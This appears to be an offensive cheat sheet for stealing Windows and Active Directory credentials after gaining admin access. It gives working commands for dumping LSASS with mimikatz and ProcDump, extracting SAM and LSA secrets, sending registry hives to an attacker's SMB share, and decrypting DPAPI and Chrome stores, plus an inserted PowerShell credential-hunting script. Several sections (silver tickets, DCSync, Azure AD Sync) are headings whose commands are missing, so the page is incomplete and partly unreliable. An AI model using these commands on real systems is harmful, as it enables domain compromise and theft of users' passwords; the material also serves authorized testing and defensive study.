Administrator account
Extract credentials from LSASS
Dump LSASS with ProcDump (a signed Sysinternals binary) and parse the minidump offline, or read LSASS directly with mimikatz. Both need SeDebugPrivilege (local admin); token::elevate switches to SYSTEM first. Opening lsass.exe is heavily monitored, so expect EDR alerts on the process access:

```
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
```

From a Meterpreter session:

```
load kiwi
creds_all
```

Remotely, against a range of hosts or a single target:

```
cme smb <ip-range> -u <user> -p <password> -M lsassy
lsassy -d <domain> -u <user> -p <password> <ip>
```

Extract Credentials from SAM
Remotely (secretsdump.py also pulls LSA secrets and cached credentials, and NTDS if the target is a DC):

```
secretsdump.py <domain>/<user>:<password>@<ip>
cme smb <ip-range> -u <user> -p <password> --sam
```

From a Meterpreter session:

```
hashdump
```

Locally, save the hives (local admin required). SYSTEM holds the boot key needed to decrypt both SAM and SECURITY, so always take it along:

```
reg save HKLM\SAM <file>
reg save HKLM\SECURITY <file>
reg save HKLM\SYSTEM <file>
```

Then parse them offline:

```
secretsdump.py -sam SAM -system SYSTEM LOCAL
```

Or read the SAM on the host with mimikatz (lsadump::sam needs SYSTEM; add token::elevate when running as a plain administrator):

```
mimikatz "privilege::debug" "lsadump::sam" "exit"
```

Shadow copies
List the existing shadow copies, then expose one as a directory link. The trailing backslash on the device path is required, and the hives are found under Windows\System32\config inside the snapshot:

```
diskshadow
list shadows all
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<N>\
```

Extract Credentials from LSA
LSA secrets (service account passwords, DPAPI_SYSTEM, cached domain logons) live in the SECURITY hive and are decrypted with the boot key from SYSTEM. Remotely, offline from saved hives, or by backing the hives up to an SMB share you control:

```
cme smb <ip-range> -u <user> -p <password> --lsa
secretsdump.py <domain>/<user>:<password>@<ip>
secretsdump.py -security <security-file> -system <system-file> LOCAL
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'
```

Extract DPAPI
sekurlsa::dpapi lists the DPAPI master keys cached in LSASS for logged-on users; DonPAPI collects and decrypts DPAPI-protected secrets remotely; the DPAPI_SYSTEM secret needed for machine-scope blobs comes out with the LSA secrets:

```
DonPAPI.py <domain>/<user>:<password>@<target>
mimikatz.exe "sekurlsa::dpapi"
secretsdump.py <domain>/<user>:<password>@<ip>
```

Extract Kerberos tickets
List the Kerberos tickets held in LSASS with mimikatz (append /export to write them out as .kirbi files):

```
sekurlsa::tickets
```

Silver Tickets
Prerequisites
NTLM hash of the service account (user or computer account) that holds the target SPN
Domain SID
Target SPN (service class and host, e.g. cifs/<host>)
Silver Ticket Forgery
NTLM Hash
Load mimikatz and extract the NTLM hash of the account that runs the service (for services running as the machine account, that is the computer account's hash):
Domain SID
Then obtain the domain SID with whoami /user: it is the current user's SID with the trailing RID removed:
Ticket Forging
With that information we can forge the ticket (mimikatz kerberos::golden with /service and /target produces a TGS, i.e. a silver ticket, so no DC is contacted):
Using the ticket
DCSync
NTLM Hash of one user
Dump all hashes
Search Password Files
Search Stored Password
Chrome
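An added example for the three search headings above (not part of the original page): hunt for files whose names suggest credentials, grep config and script files for password assignments, list the credentials Windows stores for the current user, and locate the Chrome stores that must be collected for offline DPAPI decryption. Roots, name patterns and the content regex are assumptions.

```powershell
# Added example, not from the original page. Roots, patterns and regex are assumptions.
$Roots        = "C:\Users", "C:\inetpub", "C:\ProgramData", "C:\Windows\Panther"
$NamePatterns = "*pass*", "*cred*", "*.kdbx", "unattend.xml", "sysprep.inf", "web.config", "*.rdp", "*.ppk", "id_rsa"
$ContentRegex = '(?i)(password|passwd|pwd|connectionstring)\s*[=:]\s*\S+'

# 1. Files with interesting names
Get-ChildItem -Path $Roots -Recurse -Force -Include $NamePatterns -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize

# 2. Password-looking lines inside text/config files (large files skipped to keep it fast)
Get-ChildItem -Path $Roots -Recurse -Force -Include "*.txt","*.ini","*.xml","*.config","*.ps1","*.bat","*.json" -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -lt 5MB } |
    Select-String -Pattern $ContentRegex -ErrorAction SilentlyContinue |
    Select-Object Path, LineNumber, Line | Format-Table -AutoSize

# 3. Credentials stored for the current user (Credential Manager); the blobs are DPAPI-protected
cmdkey /list

# 4. Chrome stores: the AES key sits DPAPI-protected in Local State, the logins in the Login Data SQLite file
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State",
              "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -ErrorAction SilentlyContinue |
    Select-Object FullName, Length
```

The Chrome files only help once the user's DPAPI master key is available, which is what the sekurlsa::dpapi and DonPAPI commands earlier on this page provide.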
Token Manipulation
Account Operators Group Membership
Add User
Import PowerView
Add DCSync Rights
DCSync
Azure Admin Group Membership
If a user is a member of the Azure Admins group, we can try to exploit Azure AD Sync (Azure AD Connect) to recover the clear-text password of the on-premises account it uses to connect to AD. In a default install this is the MSOL_<id> account, which holds replication (DCSync) rights on the domain, and in some environments it is a domain administrator:
Then run the following from inside C:\Program Files\Microsoft Azure AD Sync\Bin, so that the product's mcrypt.dll is found: